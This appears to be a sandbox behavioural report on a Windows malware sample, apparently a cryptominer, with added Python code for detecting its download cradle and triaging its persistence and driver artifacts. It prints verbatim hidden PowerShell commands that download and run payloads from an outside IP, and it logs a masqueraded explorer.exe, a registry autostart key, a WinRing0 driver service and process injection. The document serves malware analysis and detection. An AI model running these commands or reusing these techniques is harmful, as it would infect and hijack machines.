allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02738000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02739000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05015000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05016000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05017000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05018000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05019000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05020000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05021000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Windows (x86)\KBDMLT48.DLL
file C:\Windows (x86)\KBDBE.DLL
file C:\Windows (x86)\KBDCZ1.DLL
file C:\Windows (x86)\TRACERT.EXE
file C:\Windows (x86)\KBDLT.DLL
file C:\Windows (x86)\KBDMYAN.DLL
file C:\Windows (x86)\KBDAZST.DLL
file C:\Windows (x86)\KBDNTL.DLL
file C:\Windows (x86)\KBDA2.DLL
file C:\Windows (x86)\KBDBENE.DLL
file C:\Windows (x86)\icmp.dll
file C:\Windows (x86)\KBDINDEV.DLL
file C:\Windows (x86)\asferror.dll
file C:\Windows (x86)\kbdgeoer.dll
file C:\Windows (x86)\KBDPASH.DLL
file C:\Windows (x86)\KBDBR.DLL
file C:\Windows (x86)\tier2punctuations.dll
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
file C:\Windows (x86)\KBDMONST.DLL
file C:\Windows (x86)\KBDHU.DLL
file C:\Windows (x86)\KBDSMSFI.DLL
file C:\Windows (x86)\KBDUKX.DLL
file C:\Windows (x86)\kbdax2.dll
file C:\Windows (x86)\KBDFR.DLL
file C:\Windows (x86)\KBDYCC.DLL
file C:\Windows (x86)\KBDINBE1.DLL
file C:\Windows (x86)\kbd101a.dll
file C:\Windows (x86)\KBDTUF.DLL
file C:\Windows (x86)\KBDBLR.DLL
file C:\Windows (x86)\KBDTUQ.DLL
file C:\Windows (x86)\KBDFTHRK.DLL
file C:\Windows (x86)\KBDIBO.DLL
file C:\Windows (x86)\kbd106.dll
file C:\Windows (x86)\KBDLT2.DLL
file C:\Windows (x86)\KBDTH3.DLL
file C:\Windows (x86)\KBDIT142.DLL
file C:\Windows (x86)\KBDSL1.DLL
file C:\Windows (x86)\KBDRU.DLL
file C:\Windows (x86)\KBDUSL.DLL
file C:\Windows (x86)\KBDJAV.DLL
file C:\Windows (x86)\KBDMACST.DLL
file C:\Windows (x86)\KBDUSX.DLL
file C:\Windows (x86)\KBDDV.DLL
file C:\Windows (x86)\kbdgeoqw.dll
file C:\Windows (x86)\KBDMAORI.DLL
file C:\Windows (x86)\KBDLV1.DLL
file C:\Windows (x86)\KBDINUK2.DLL
file C:\Windows (x86)\KBDINASA.DLL
file C:\Windows (x86)\KBDINORI.DLL
file C:\Windows (x86)\KBDIR.DLL
file C:\Users\test22\AppData\Local\Temp\updateW\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
cmdline PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com'
cmdline PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com'
file C:\Users\test22\AppData\Local\Temp\updateW\a.vbs
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
file C:\Users\test22\AppData\Local\Temp\updateW\win.com
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
file C:\Windows (x86)\explorer.exe
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
file C:\Users\test22\AppData\Local\Temp\updateW\win.com
wmi SELECT * FROM Win32_Process WHERE ExecutablePath='C:\\Windows (x86)\\explorer.exe'
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
1 1 0

CreateProcessInternalW

thread_identifier: 2196
thread_handle: 0x00000090
process_identifier: 260
current_directory: C:\Users\test22\AppData\Local\Temp\updateW
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com'
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2852
thread_handle: 0x00000094
process_identifier: 2228
current_directory: C:\Users\test22\AppData\Local\Temp\updateW
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com'
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0
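The two PowerShell command lines above are a textbook download-and-execute cradle: a WebClient.DownloadFile() into the user's Temp directory followed by Start-Process on the same path, run with -ExecutionPolicy bypass, -noprofile and -windowstyle hidden. The following Python is an added example, not part of the sandbox report, that pulls the remote URL, the drop path and the launch target out of such a command line and names the evasion switches; the two command lines are copied from the report, the switch aliases are the ones powershell.exe's own usage text lists, and the regular expressions and the scoring are my own.

```python
import re
from dataclasses import dataclass
from typing import Optional

# The two PowerShell command lines recorded in the report, copied verbatim (test input).
REPORT_CMDLINES = [
    "PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden "
    "(New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com',"
    "'C:\\Users\\test22\\AppData\\Local\\Temp\\updateW\\win.com');"
    "Start-Process 'C:\\Users\\test22\\AppData\\Local\\Temp\\updateW\\win.com'",
    "PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden "
    "(New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com',"
    "'C:\\Users\\test22\\AppData\\Local\\Temp\\updateW\\64a1.com');"
    "Start-Process 'C:\\Users\\test22\\AppData\\Local\\Temp\\updateW\\64a1.com'",
]

# powershell.exe parameter names plus the abbreviations listed by "powershell -?".
# PowerShell also accepts any unambiguous prefix (-exec, -win); those are not handled here.
SWITCH_ALIASES = {
    "executionpolicy": "executionpolicy", "ex": "executionpolicy", "ep": "executionpolicy",
    "noprofile": "noprofile", "nop": "noprofile",
    "windowstyle": "windowstyle", "w": "windowstyle",
    "encodedcommand": "encodedcommand", "e": "encodedcommand", "ec": "encodedcommand", "enc": "encodedcommand",
    "noninteractive": "noninteractive", "noni": "noninteractive",
    "command": "command", "c": "command",
    "file": "file",
}
TAKES_VALUE = {"executionpolicy", "windowstyle", "encodedcommand"}  # -Command/-File swallow the rest
WINDOWSTYLE_NUMERIC = {"0": "normal", "1": "hidden", "2": "minimized", "3": "maximized"}

# Switch settings that mark an unattended, hidden run rather than an admin at a console.
EVASION = {
    "executionpolicy": lambda v: v in ("bypass", "unrestricted"),
    "noprofile": lambda v: True,
    "windowstyle": lambda v: v == "hidden",
    "encodedcommand": lambda v: True,
    "noninteractive": lambda v: True,
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
DOWNLOADFILE_RE = re.compile(r"DownloadFile\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)", re.I)
START_PROCESS_RE = re.compile(r"Start-Process\s+(?:-FilePath\s+)?['\"]?([^'\";\s]+)", re.I)
FETCH_RE = re.compile(r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|Start-BitsTransfer|\b(?:iwr|curl|wget)\b", re.I)
EXEC_RE = re.compile(r"\bIEX\b|Invoke-Expression|Start-Process", re.I)


@dataclass
class Cradle:
    switches: dict               # canonical switch name -> value (None for plain flags)
    body: str                    # script text that follows the switches
    urls: list
    drop_path: Optional[str]     # second argument of DownloadFile()
    launch_target: Optional[str] # first argument of Start-Process

    @property
    def evasion(self) -> list:
        return [f"{n} {v}" if v else n for n, v in self.switches.items() if n in EVASION and EVASION[n](v)]

    @property
    def is_download_cradle(self) -> bool:
        return bool(self.urls) and FETCH_RE.search(self.body) is not None

    @property
    def executes_payload(self) -> bool:
        return self.launch_target is not None or EXEC_RE.search(self.body) is not None

    @property
    def launches_dropped_file(self) -> bool:
        return bool(self.drop_path and self.launch_target and self.drop_path.lower() == self.launch_target.lower())


def analyze(cmdline: str) -> Optional[Cradle]:
    """Parse a powershell.exe command line; returns None when it is not a PowerShell invocation."""
    tokens = cmdline.split()
    image = tokens[0].strip('"').rsplit("\\", 1)[-1].lower() if tokens else ""
    if image not in ("powershell", "powershell.exe", "pwsh", "pwsh.exe"):
        return None
    switches, i = {}, 1
    while i < len(tokens) and tokens[i].startswith("-"):
        name = SWITCH_ALIASES.get(tokens[i][1:].lower())
        if name is None:
            break                                   # unknown switch: the script body starts here
        if name in ("command", "file"):             # everything after these is the payload
            switches[name] = None
            i += 1
            break
        value = None
        if name in TAKES_VALUE and i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
            value = tokens[i + 1].lower()
            if name == "windowstyle":               # -w 1 is the same as -WindowStyle Hidden
                value = WINDOWSTYLE_NUMERIC.get(value, value)
            i += 1
        switches[name] = value
        i += 1
    body = " ".join(tokens[i:])
    dl = DOWNLOADFILE_RE.search(body)
    sp = START_PROCESS_RE.search(body)
    return Cradle(switches, body, URL_RE.findall(body), dl.group(2) if dl else None, sp.group(1) if sp else None)
```

A Sysmon event ID 1 or 4688-with-command-line feed can be run through analyze() directly; the combination is_download_cradle and executes_payload with at least one evasion entry is the alert condition, and drop_path gives the file to collect.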
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received (binary payload, 4 entries; non-printable bytes omitted)
Data sent GET /xm/win.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive
Data sent GET /xm/64a1.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x000000000000023c
process_name: conhost.exe
process_identifier: 1596
0 0

Process32NextW

snapshot_handle: 0x0000000000000240
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000244
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000248
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x000000000000024c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000250
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000254
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000258
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x000000000000025c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000260
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000274
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000284
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000288
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000280
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000290
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000294
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x000000000000028c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x000000000000029c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002a0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000298
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002a8
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002ac
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002b0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002a4
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002b8
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002bc
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002b4
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002c0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002d0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002cc
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002d8
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002d4
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002dc
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002e0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002e4
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002ec
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002e8
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002f0
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002f4
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002f8
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000300
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x00000000000002fc
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000308
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000314
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x000000000000030c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000320
process_name: taskhost.exe
process_identifier: 2092
0 0

Process32NextW

snapshot_handle: 0x0000000000000324
process_name: taskhost.exe
process_identifier: 2092
0 0
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_private_profile
description Affect private profile rule win_files_operation
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
cmdline ping 127.0.0.1 -n 5
cmdline ping 127.0.0.1 -n 10
host 34.126.93.163
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Microsoft Manager reg_value C:\Windows (x86)\explorer.exe
Time & API Arguments Status Return Repeated

CreateServiceW

service_start_name:
start_type: 3
password:
display_name: WinRing0_1_2_0
filepath: C:\Windows (x86)\WinRing0x64.sys
service_name: WinRing0_1_2_0
filepath_r: C:\Windows (x86)\WinRing0x64.sys
desired_access: 983551
service_handle: 0x00000000004f4100
error_control: 1
service_type: 1
service_manager_handle: 0x00000000004f3f50
1 5193984 0
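Three artifacts in this part of the report deserve a specific check rather than a generic "registry modified" verdict: the autostart value under HKLM\...\Policies\Explorer\Run (a policy key that is normally unpopulated unless Group Policy sets it), a kernel-driver service (service_type 1, desired_access 983551 = SERVICE_ALL_ACCESS) whose binary lives outside System32\drivers, and the directory C:\Windows (x86), which does not exist on a stock install but reads like a system path. WinRing0 is the hardware-access driver XMRig ships with, which, together with the pool.hashvault.pro lookup in the summary, points at a miner. The following Python is an added example, not part of the report, that applies those three checks to the report's values; the service constants are the winsvc.h values, the look-alike-directory heuristic and the genuine explorer.exe locations are my own assumptions.

```python
from pathlib import PureWindowsPath
from typing import Optional

# Values copied from the reg_key line and the CreateServiceW block above (constructed test input).
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Microsoft Manager"
RUN_VALUE = r"C:\Windows (x86)\explorer.exe"
SERVICE_CALL = {
    "service_name": "WinRing0_1_2_0",
    "filepath": r"C:\Windows (x86)\WinRing0x64.sys",
    "service_type": 1,
    "start_type": 3,
    "desired_access": 983551,
}

# Service constants from winsvc.h.
SERVICE_TYPES = {0x1: "SERVICE_KERNEL_DRIVER", 0x2: "SERVICE_FILE_SYSTEM_DRIVER",
                 0x10: "SERVICE_WIN32_OWN_PROCESS", 0x20: "SERVICE_WIN32_SHARE_PROCESS"}
START_TYPES = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
               3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
SERVICE_ALL_ACCESS = 0xF01FF
ACCESS_BITS = {0x1: "SERVICE_QUERY_CONFIG", 0x2: "SERVICE_CHANGE_CONFIG", 0x4: "SERVICE_QUERY_STATUS",
               0x8: "SERVICE_ENUMERATE_DEPENDENTS", 0x10: "SERVICE_START", 0x20: "SERVICE_STOP",
               0x40: "SERVICE_PAUSE_CONTINUE", 0x80: "SERVICE_INTERROGATE",
               0x100: "SERVICE_USER_DEFINED_CONTROL", 0xF0000: "STANDARD_RIGHTS_REQUIRED"}

# Top-level directories that really exist on the system drive (assumption: a standard 64-bit
# install); a name that merely resembles one of them, such as "Windows (x86)", is a look-alike.
REAL_ROOT_DIRS = {"windows", "windows.old", "program files", "program files (x86)", "programdata", "users"}
LOOKALIKE_STEMS = ("windows", "program files")
GENUINE_LOCATIONS = {"explorer.exe": {r"c:\windows\explorer.exe", r"c:\windows\syswow64\explorer.exe"}}
DRIVER_DIR = r"c:\windows\system32\drivers"


def decode_service(call: dict) -> dict:
    """Translate the numeric CreateServiceW arguments into their symbolic names."""
    access = call["desired_access"]
    if access == SERVICE_ALL_ACCESS:
        rights = ["SERVICE_ALL_ACCESS"]
    else:
        rights = [name for bit, name in sorted(ACCESS_BITS.items()) if access & bit == bit]
    return {
        "service_type": SERVICE_TYPES.get(call["service_type"], hex(call["service_type"])),
        "start_type": START_TYPES.get(call["start_type"], str(call["start_type"])),
        "desired_access": rights,
    }


def masquerade_reason(path: str) -> Optional[str]:
    """Explain why a path imitates a system location, or None if it does not."""
    p = PureWindowsPath(path)
    parts = [s.lower() for s in p.parts]          # e.g. ['c:\\', 'windows (x86)', 'explorer.exe']
    if len(parts) < 2:
        return None
    top = parts[1]
    if top not in REAL_ROOT_DIRS and top.startswith(LOOKALIKE_STEMS):
        return f"top-level directory '{p.parts[1]}' imitates a system directory"
    genuine = GENUINE_LOCATIONS.get(p.name.lower())
    if genuine and str(p).lower() not in genuine:
        return f"{p.name} outside its genuine location(s)"
    return None


def triage(run_key: str, run_value: str, service_call: dict) -> list:
    """Return (tag, detail) findings for the persistence value and the service creation."""
    findings = []
    if "\\policies\\explorer\\run\\" in run_key.lower() + "\\":
        findings.append(("persistence", "autostart via Policies\\Explorer\\Run, a policy key that is normally empty"))
    reason = masquerade_reason(run_value)
    if reason:
        findings.append(("masquerade", f"{run_value}: {reason}"))
    svc = decode_service(service_call)
    drv = service_call["filepath"]
    if svc["service_type"] == "SERVICE_KERNEL_DRIVER":
        if not drv.lower().startswith(DRIVER_DIR):
            findings.append(("driver", f"kernel driver {service_call['service_name']} loaded from {drv}, outside {DRIVER_DIR}"))
        reason = masquerade_reason(drv)
        if reason:
            findings.append(("masquerade", f"{drv}: {reason}"))
    return findings
```

On a live host the same three checks map to reading the Policies\Explorer\Run key, enumerating kernel-driver services with an ImagePath outside System32\drivers, and listing any top-level directory on the system drive that is not in REAL_ROOT_DIRS.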
file C:\Users\test22\AppData\Local\Temp\updateW\win.com
Time & API Arguments Status Return Repeated

WSASend

buffer: (binary; a TLS ClientHello, the cipher-suite list is recognizable; non-printable bytes omitted)
socket: 528
0 0

WSASend

buffer: (binary; non-printable bytes omitted)
socket: 528
0 0
Time & API Arguments Status Return Repeated

send

buffer: GET /xm/win.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive
socket: 1420
sent: 73
1 73 0

send

buffer: GET /xm/64a1.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive
socket: 1436
sent: 74
1 74 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\updateW\win.com"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\updateW\win.com
parent_process wscript.exe martian_process "C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat"
parent_process wscript.exe martian_process C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\updateW\64a1.com"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
Process injection Process 2648 resumed a thread in remote process 1160
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 1160
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 3016
thread_handle: 0x000002e8
process_identifier: 2196
current_directory: C:\Windows (x86)
filepath: C:\Windows (x86)\explorer.exe
track: 1
command_line: "C:\Windows (x86)\explorer.exe"
filepath_r: C:\Windows (x86)\explorer.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f0
1 1 0

ShellExecuteExW

show_type: 1
filepath_r: C:\Windows (x86)\explorer.exe
parameters:
filepath: C:\Windows (x86)\explorer.exe
1 1 0
